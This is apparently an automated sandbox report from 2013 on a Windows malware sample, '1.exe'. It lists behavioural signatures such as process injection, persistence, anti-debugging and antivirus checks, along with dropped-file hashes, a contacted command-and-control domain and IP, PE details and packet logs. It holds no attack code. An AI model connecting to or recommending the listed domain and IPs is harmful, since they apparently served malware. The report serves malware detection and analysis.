General Information

Analysis ID:428
Start time:07:15:57
Start date:28/11/2013
Overall analysis duration:0h 3m 9s
Report type:full
Sample file name:1.exe
Cookbook file name:windows.jbs
Analysis system description:Windows 7
Number of new started processes analysed:6
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:2
HCA enabled:true
HCA success:true, ratio: 100%
Warnings:
  • Report size getting too big, too many NtMapViewOfSection calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.


Detection



Signature Overview

Networking:

Contains functionality to download additional files from the internet
Urls found in memory or binary data
Performs DNS lookups
Posts data to webserver
Only suspicious signatures are shown. Full signature information is available in Joe Security's commercial products.

Boot Survival:

Contains functionality to start windows services
Creates an autostart registry key

Stealing of Sensitive Information:


Persistence and Installation Behavior:

Contains functionality to download and launch executables

Data Obfuscation:

Binary may include packed or encrypted data
Contains functionality to dynamically determine API calls
PE file contains an invalid checksum
PE sections with suspicious entropy found

Spreading:

Contains functionality to enumerate / list files inside a directory
Contains functionality to get notified if a device is plugged in / out

System Summary:

Contains functionality to adjust token privileges (e.g. debug / backup)
Contains functionality to enum processes or threads
Creates files inside the program directory
Creates files inside the user directory
Reads ini files
Spawns processes
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Reads the hosts file
Uses Microsoft's Enhanced Cryptographic Provider

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to create a new security descriptor
Checks for installed Antivirus programs
Contains functionality to inject threads in other processes
Contains functionality to launch a program with higher privileges
May try to detect the Windows Explorer process (often used for injection)

Anti Debugging:

Contains functionality to query system information
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
Launches processes in debugging mode, may be used to hinder debugging

Virtual Machine Detection:

Contains functionality to enumerate / list files inside a directory
Contains functionality to query system information
Queries a list of all running processes
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Hooking and other Techniques for Stealthiness and Protection:


Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)

Language, Device and Operating System Detection:

Contains functionality to query local / system time
Contains functionality to query time zone information
Contains functionality to query windows version

Screenshot

Startup

  • system is w7
  • 1.exe (PID: 3888 MD5: C0D2E08C3F0D964858B8A9788AA6732E)
    • 1.exe (PID: 3412 MD5: C0D2E08C3F0D964858B8A9788AA6732E)
      • schtasks.exe (PID: 3464 MD5: BA17F6EBA7152354FE67ADE9BDCDA60E)
      • explorer.exe (PID: 2772 MD5: 2626FC9755BE22F805D3CFA0CE3EE727)
        • explorer.exe (PID: 1104 MD5: 2626FC9755BE22F805D3CFA0CE3EE727)
        • conhost.exe (PID: 3328 MD5: 29D9FCDF65B7C823688A035937BB6697)
  • cleanup

Created / dropped Files

File Path | Hashes
C:\ProgramData\blacksilver0\nnkzcpsaq.exe (copy)
  • MD5: C0D2E08C3F0D964858B8A9788AA6732E
  • SHA: FD8749ED0EEDB4CA07803565881A706C8869BD01
  • SHA-256: 917627C7E3DEC25D7EB80020C98804C8FF993922DA9F0076200A8D4B6927A7EF
  • SHA-512: AC437025BAE1CFA0F76CE4A26AA4EFA09F5AE2E1CCBBB61B8C781EBABCFA6C4552750481ECA2E98B1151BF1F2B736E051590623891F7D2D4D9249F68759A60C5
C:\Users\admin\AppData\Local\Microsoft\Windows\WER\ERC\responsestatecache.xml
  • MD5: E5A5A467DD553B6B673677505C72444E
  • SHA: B3C6675C52CAA141B0BD349CB8821ACBEE060911
  • SHA-256: 0638CE2BE72BEFBB12472A98E6D40D37A6032AD0B4AA48B162C66B50C2C44DDA
  • SHA-512: 45A28659BDC1EE691E09DDCF708DBD63E9C8330B3C3BDFD7E91053B6F3D2A4AD43DA96D42B182AFF0BDE87A0BD6901FB003E12443C8F44DEA0C1B547F1025521
\samr
  • MD5: 080E701E8B8E2E9C68203C150AC7C6B7
  • SHA: 4EF041621388B805758AE1D3B122F9D364705223
  • SHA-256: FE129AE2A7C96708754F6F51091E6E512C9FEACA1042A1E9DB914C651FEB344D
  • SHA-512: C11D88B8E355B7B922B985802464B693F75BA4C2A62F9137A15842CA82F9B6B3ED13059EDC0DF1C04E7DE43719D892B4C0D22BB67BE0D57EAB368BA1BC057E79

Contacted Domains

Name | IP | Name Server | Active | Registrar | e-Mail
dayzstreaming.co.uk | 37.221.170.194 | dns3.registrar-servers.com dns5.registrar-servers.com dns4.registrar-servers.com dns1.registrar-servers.com dns2.registrar-servers.com | true | unknown | 

Contacted IPs

IP | Country | Pingable | Open Ports
195.168.1.121 | Slovakia (SLOVAK Republic) | false | 
37.221.170.194 | Romania | false | 
224.0.0.252 | Reserved | false | 
157.56.141.114 | United States | false | 80 443
239.255.255.250 | Reserved | false | 
157.56.144.215 | United States | false | 

Static File Info

File type:PE32 executable (GUI) Intel 80386, for MS Windows
File name:1.exe
File size:226617
MD5:c0d2e08c3f0d964858b8a9788aa6732e
SHA1:fd8749ed0eedb4ca07803565881a706c8869bd01
SHA256:917627c7e3dec25d7eb80020c98804c8ff993922da9f0076200a8d4b6927a7ef
SHA512:ac437025bae1cfa0f76ce4a26aa4efa09f5ae2e1ccbbb61b8c781ebabcfa6c4552750481eca2e98b1151bf1f2b736e051590623891f7d2d4d9249f68759a60c5

Static PE Info

General
Entrypoint:0x4062cb
Entrypoint Section:.text
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:0x5283865B [Wed Nov 13 14:02:03 2013 UTC]
TLS Callbacks:
Digitally signed:False
CLR (.Net) Version:
Resources
Name | RVA | Size | Type | Language | Country
RT_ICON | 0xd400 | 0xea8 | data | | 
RT_MENU | 0xe2a8 | 0xda | data | Chinese | China
RT_DIALOG | 0xe384 | 0x14c | data | German | Switzerland
RT_DIALOG | 0xe4d0 | 0x80 | data | English | United States
RT_DIALOG | 0xe550 | 0x182 | data | French | Canada
RT_STRING | 0xe6d4 | 0x8c | data | Chinese | China
RT_STRING | 0xe760 | 0x36 | data | Chinese | China
RT_STRING | 0xe798 | 0x92 | PCX ver. 2.5 image data | Chinese | China
RT_STRING | 0xe82c | 0xc0 | Hitachi SH big-endian COFF executable, stripped | Chinese | China
RT_STRING | 0xe8ec | 0x136 | data | Chinese | China
RT_STRING | 0xea24 | 0x3c | data | Chinese | China
RT_STRING | 0xea60 | 0x60 | data | Chinese | China
RT_STRING | 0xeac0 | 0x54 | data | Chinese | China
RT_STRING | 0xeb14 | 0x3a | data | Chinese | China
RT_STRING | 0xeb50 | 0xa4 | DBase 3 index file | Chinese | China
RT_STRING | 0xebf4 | 0x3e | data | Chinese | China
RT_ACCELERATOR | 0xec34 | 0x10 | data | Chinese | China
RT_GROUP_ICON | 0xec44 | 0x14 | MS Windows icon resource - 1 icon | | 
Imports
DLL | Import
MFC42.DLL | 
MSVCRT.dll | cos, __CxxFrameHandler, memcpy, _ftol, sin, malloc, memset
KERNEL32.dll | CreateFileW, GetCurrentProcessId, OpenProcess, Sleep, GetTimeZoneInformation, DeleteFileW, GetCurrentDirectoryW, LocalFree, MapViewOfFile, FlushFileBuffers, GetCurrentThreadId, HeapFree, FindClose, GlobalFree, GetModuleFileNameW
USER32.dll | SystemParametersInfoW, DrawEdge, EnableWindow, DispatchMessageA, CreateDialogParamW, InvalidateRect, ReleaseDC, GetCursorPos, GetParent, GetSystemMenu, UpdateWindow, MessageBoxIndirectW
GDI32.dll | DeleteObject, RealizePalette, SelectPalette, CreatePalette, CreateDIBitmap, GetCharacterPlacementW, TextOutW, LineTo, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, BitBlt, StretchDIBits
PSAPI.DLL | GetModuleFileNameExA
Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy
.text | 0x1000 | 0x81d4 | 0x9000 | 5.98709818213
.rdata | 0xa000 | 0x165a | 0x9000 | 6.16881507582
.data | 0xc000 | 0xb4 | 0x1000 | 0.322800881826
.rsrc | 0xd000 | 0x1c58 | 0x2000 | 4.94507807665
Possible Origin
Language of compilation system | Country where language is spoken
Chinese | China
German | Switzerland
English | United States
French | Canada

Network Behavior

TCP Packets
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 28, 2013 07:16:29.895668983 CET | 58688 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:16:29.895675898 CET | 58688 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:16:29.997387886 CET | 58688 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:16:29.997394085 CET | 58688 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:16:31.622075081 CET | 49176 | 443 | 192.168.0.3 | 157.56.141.114
Nov 28, 2013 07:16:33.009309053 CET | 56282 | 53 | 192.168.0.3 | 195.168.1.121
Nov 28, 2013 07:16:33.330398083 CET | 53 | 56282 | 195.168.1.121 | 192.168.0.3
Nov 28, 2013 07:16:34.168059111 CET | 59212 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:16:34.168066025 CET | 59212 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:16:34.263489008 CET | 59212 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:16:34.263494968 CET | 59212 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:16:36.775176048 CET | 52687 | 53 | 192.168.0.3 | 195.168.1.121
Nov 28, 2013 07:16:36.961488962 CET | 53 | 52687 | 195.168.1.121 | 192.168.0.3
Nov 28, 2013 07:16:37.670259953 CET | 49176 | 443 | 192.168.0.3 | 157.56.141.114
Nov 28, 2013 07:16:52.262357950 CET | 64198 | 53 | 192.168.0.3 | 195.168.1.121
Nov 28, 2013 07:16:52.420353889 CET | 53 | 64198 | 195.168.1.121 | 192.168.0.3
Nov 28, 2013 07:16:52.426619053 CET | 61219 | 53 | 192.168.0.3 | 195.168.1.121
Nov 28, 2013 07:16:52.869318008 CET | 53 | 61219 | 195.168.1.121 | 192.168.0.3
Nov 28, 2013 07:16:52.981300116 CET | 49180 | 80 | 192.168.0.3 | 37.221.170.194
Nov 28, 2013 07:16:52.981343031 CET | 80 | 49180 | 37.221.170.194 | 192.168.0.3
Nov 28, 2013 07:16:52.981477976 CET | 49180 | 80 | 192.168.0.3 | 37.221.170.194
Nov 28, 2013 07:16:52.982619047 CET | 49180 | 80 | 192.168.0.3 | 37.221.170.194
Nov 28, 2013 07:16:52.982636929 CET | 80 | 49180 | 37.221.170.194 | 192.168.0.3
Nov 28, 2013 07:16:58.134048939 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:16:58.134061098 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:00.108828068 CET | 80 | 49180 | 37.221.170.194 | 192.168.0.3
Nov 28, 2013 07:17:00.108947992 CET | 49180 | 80 | 192.168.0.3 | 37.221.170.194
Nov 28, 2013 07:17:00.109597921 CET | 49180 | 80 | 192.168.0.3 | 37.221.170.194
Nov 28, 2013 07:17:00.109622955 CET | 80 | 49180 | 37.221.170.194 | 192.168.0.3
Nov 28, 2013 07:17:01.049108982 CET | 54003 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:17:01.049114943 CET | 54003 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:17:01.122612953 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:01.122620106 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:01.153697968 CET | 54003 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:17:01.153703928 CET | 54003 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:17:03.903907061 CET | 56457 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:17:03.903913021 CET | 56457 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:17:04.013012886 CET | 56457 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:17:04.013017893 CET | 56457 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:17:04.122205973 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:04.122217894 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:04.249618053 CET | 49879 | 53 | 192.168.0.3 | 195.168.1.121
Nov 28, 2013 07:17:04.564111948 CET | 53 | 49879 | 195.168.1.121 | 192.168.0.3
Nov 28, 2013 07:17:27.549781084 CET | 55277 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:17:27.549787045 CET | 55277 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:17:27.649880886 CET | 55277 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:17:27.649887085 CET | 55277 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:17:28.383827925 CET | 51233 | 53 | 192.168.0.3 | 195.168.1.121
Nov 28, 2013 07:17:28.481726885 CET | 57996 | 3702 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:28.481738091 CET | 57996 | 3702 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:28.489522934 CET | 53 | 51233 | 195.168.1.121 | 192.168.0.3
Nov 28, 2013 07:17:28.720371962 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:28.720386028 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:28.721329927 CET | 57996 | 3702 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:28.721337080 CET | 57996 | 3702 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:28.843223095 CET | 54267 | 3702 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:28.843236923 CET | 54267 | 3702 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:28.966346025 CET | 54267 | 3702 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:28.966356993 CET | 54267 | 3702 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:29.718537092 CET | 59570 | 53 | 192.168.0.3 | 195.168.1.121
Nov 28, 2013 07:17:29.981165886 CET | 53 | 59570 | 195.168.1.121 | 192.168.0.3
Nov 28, 2013 07:17:29.982398033 CET | 57613 | 53 | 192.168.0.3 | 195.168.1.121
Nov 28, 2013 07:17:29.982458115 CET | 53 | 57613 | 195.168.1.121 | 192.168.0.3
Nov 28, 2013 07:17:30.402442932 CET | 63213 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:17:30.402447939 CET | 63213 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:17:30.497788906 CET | 63213 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:17:30.497793913 CET | 63213 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:17:31.715928078 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:31.715943098 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:32.951653957 CET | 52138 | 53 | 192.168.0.3 | 195.168.1.121
Nov 28, 2013 07:17:33.283871889 CET | 53 | 52138 | 195.168.1.121 | 192.168.0.3
Nov 28, 2013 07:17:34.715907097 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:34.715917110 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:37.734961987 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:37.734973907 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:40.732364893 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:40.732376099 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:43.731961966 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:43.731977940 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:44.357409000 CET | 58873 | 53 | 192.168.0.3 | 195.168.1.121
Nov 28, 2013 07:17:44.456975937 CET | 53 | 58873 | 195.168.1.121 | 192.168.0.3
Nov 28, 2013 07:17:44.556034088 CET | 58518 | 53 | 192.168.0.3 | 195.168.1.121
Nov 28, 2013 07:17:44.556164026 CET | 53 | 58518 | 195.168.1.121 | 192.168.0.3
Nov 28, 2013 07:17:44.688368082 CET | 57996 | 3702 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:44.688375950 CET | 57996 | 3702 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:44.759063959 CET | 57996 | 3702 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:44.759079933 CET | 57996 | 3702 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:44.765594959 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:44.765604019 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:44.957603931 CET | 55076 | 53 | 192.168.0.3 | 195.168.1.121
Nov 28, 2013 07:17:44.957719088 CET | 53 | 55076 | 195.168.1.121 | 192.168.0.3
Nov 28, 2013 07:17:44.958497047 CET | 60944 | 53 | 192.168.0.3 | 195.168.1.121
Nov 28, 2013 07:17:44.958543062 CET | 53 | 60944 | 195.168.1.121 | 192.168.0.3
Nov 28, 2013 07:17:46.061209917 CET | 62789 | 53 | 192.168.0.3 | 195.168.1.121
Nov 28, 2013 07:17:46.061326027 CET | 53 | 62789 | 195.168.1.121 | 192.168.0.3
Nov 28, 2013 07:17:46.746404886 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:46.746417046 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:47.248678923 CET | 54267 | 3702 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:47.248691082 CET | 54267 | 3702 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:47.372385025 CET | 54267 | 3702 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:47.372394085 CET | 54267 | 3702 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:47.762839079 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:47.762851000 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:49.731966972 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:49.731980085 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:50.762788057 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:50.762804031 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:52.731554031 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:52.731560946 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:18:00.108830929 CET | 58439 | 53 | 192.168.0.3 | 195.168.1.121
Nov 28, 2013 07:18:00.108964920 CET | 53 | 58439 | 195.168.1.121 | 192.168.0.3
Nov 28, 2013 07:18:00.120240927 CET | 49186 | 80 | 192.168.0.3 | 37.221.170.194
Nov 28, 2013 07:18:00.120275974 CET | 80 | 49186 | 37.221.170.194 | 192.168.0.3
Nov 28, 2013 07:18:00.120352983 CET | 49186 | 80 | 192.168.0.3 | 37.221.170.194
Nov 28, 2013 07:18:00.121244907 CET | 49186 | 80 | 192.168.0.3 | 37.221.170.194
Nov 28, 2013 07:18:00.121269941 CET | 80 | 49186 | 37.221.170.194 | 192.168.0.3
Nov 28, 2013 07:18:07.235912085 CET | 80 | 49186 | 37.221.170.194 | 192.168.0.3
Nov 28, 2013 07:18:07.236033916 CET | 49186 | 80 | 192.168.0.3 | 37.221.170.194
Nov 28, 2013 07:18:07.236289024 CET | 49186 | 80 | 192.168.0.3 | 37.221.170.194
Nov 28, 2013 07:18:07.236305952 CET | 80 | 49186 | 37.221.170.194 | 192.168.0.3
UDP Packets
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 28, 2013 07:16:29.895668983 CET | 58688 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:16:29.895675898 CET | 58688 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:16:29.997387886 CET | 58688 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:16:29.997394085 CET | 58688 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:16:33.009309053 CET | 56282 | 53 | 192.168.0.3 | 195.168.1.121
Nov 28, 2013 07:16:33.330398083 CET | 53 | 56282 | 195.168.1.121 | 192.168.0.3
Nov 28, 2013 07:16:34.168059111 CET | 59212 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:16:34.168066025 CET | 59212 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:16:34.263489008 CET | 59212 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:16:34.263494968 CET | 59212 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:16:36.775176048 CET | 52687 | 53 | 192.168.0.3 | 195.168.1.121
Nov 28, 2013 07:16:36.961488962 CET | 53 | 52687 | 195.168.1.121 | 192.168.0.3
Nov 28, 2013 07:16:52.262357950 CET | 64198 | 53 | 192.168.0.3 | 195.168.1.121
Nov 28, 2013 07:16:52.420353889 CET | 53 | 64198 | 195.168.1.121 | 192.168.0.3
Nov 28, 2013 07:16:52.426619053 CET | 61219 | 53 | 192.168.0.3 | 195.168.1.121
Nov 28, 2013 07:16:52.869318008 CET | 53 | 61219 | 195.168.1.121 | 192.168.0.3
Nov 28, 2013 07:16:58.134048939 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:16:58.134061098 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:01.049108982 CET | 54003 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:17:01.049114943 CET | 54003 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:17:01.122612953 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:01.122620106 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:01.153697968 CET | 54003 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:17:01.153703928 CET | 54003 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:17:03.903907061 CET | 56457 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:17:03.903913021 CET | 56457 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:17:04.013012886 CET | 56457 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:17:04.013017893 CET | 56457 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:17:04.122205973 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:04.122217894 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:04.249618053 CET | 49879 | 53 | 192.168.0.3 | 195.168.1.121
Nov 28, 2013 07:17:04.564111948 CET | 53 | 49879 | 195.168.1.121 | 192.168.0.3
Nov 28, 2013 07:17:27.549781084 CET | 55277 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:17:27.549787045 CET | 55277 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:17:27.649880886 CET | 55277 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:17:27.649887085 CET | 55277 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:17:28.383827925 CET | 51233 | 53 | 192.168.0.3 | 195.168.1.121
Nov 28, 2013 07:17:28.481726885 CET | 57996 | 3702 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:28.481738091 CET | 57996 | 3702 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:28.489522934 CET | 53 | 51233 | 195.168.1.121 | 192.168.0.3
Nov 28, 2013 07:17:28.720371962 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:28.720386028 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:28.721329927 CET | 57996 | 3702 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:28.721337080 CET | 57996 | 3702 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:28.843223095 CET | 54267 | 3702 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:28.843236923 CET | 54267 | 3702 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:28.966346025 CET | 54267 | 3702 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:28.966356993 CET | 54267 | 3702 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:29.718537092 CET | 59570 | 53 | 192.168.0.3 | 195.168.1.121
Nov 28, 2013 07:17:29.981165886 CET | 53 | 59570 | 195.168.1.121 | 192.168.0.3
Nov 28, 2013 07:17:29.982398033 CET | 57613 | 53 | 192.168.0.3 | 195.168.1.121
Nov 28, 2013 07:17:29.982458115 CET | 53 | 57613 | 195.168.1.121 | 192.168.0.3
Nov 28, 2013 07:17:30.402442932 CET | 63213 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:17:30.402447939 CET | 63213 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:17:30.497788906 CET | 63213 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:17:30.497793913 CET | 63213 | 5355 | 192.168.0.3 | 224.0.0.252
Nov 28, 2013 07:17:31.715928078 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:31.715943098 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:32.951653957 CET | 52138 | 53 | 192.168.0.3 | 195.168.1.121
Nov 28, 2013 07:17:33.283871889 CET | 53 | 52138 | 195.168.1.121 | 192.168.0.3
Nov 28, 2013 07:17:34.715907097 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:34.715917110 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:37.734961987 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:37.734973907 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:40.732364893 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:40.732376099 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:43.731961966 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:43.731977940 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:44.357409000 CET | 58873 | 53 | 192.168.0.3 | 195.168.1.121
Nov 28, 2013 07:17:44.456975937 CET | 53 | 58873 | 195.168.1.121 | 192.168.0.3
Nov 28, 2013 07:17:44.556034088 CET | 58518 | 53 | 192.168.0.3 | 195.168.1.121
Nov 28, 2013 07:17:44.556164026 CET | 53 | 58518 | 195.168.1.121 | 192.168.0.3
Nov 28, 2013 07:17:44.688368082 CET | 57996 | 3702 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:44.688375950 CET | 57996 | 3702 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:44.759063959 CET | 57996 | 3702 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:44.759079933 CET | 57996 | 3702 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:44.765594959 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:44.765604019 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:44.957603931 CET | 55076 | 53 | 192.168.0.3 | 195.168.1.121
Nov 28, 2013 07:17:44.957719088 CET | 53 | 55076 | 195.168.1.121 | 192.168.0.3
Nov 28, 2013 07:17:44.958497047 CET | 60944 | 53 | 192.168.0.3 | 195.168.1.121
Nov 28, 2013 07:17:44.958543062 CET | 53 | 60944 | 195.168.1.121 | 192.168.0.3
Nov 28, 2013 07:17:46.061209917 CET | 62789 | 53 | 192.168.0.3 | 195.168.1.121
Nov 28, 2013 07:17:46.061326027 CET | 53 | 62789 | 195.168.1.121 | 192.168.0.3
Nov 28, 2013 07:17:46.746404886 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
Nov 28, 2013 07:17:46.746417046 CET | 61222 | 1900 | 192.168.0.3 | 239.255.255.250
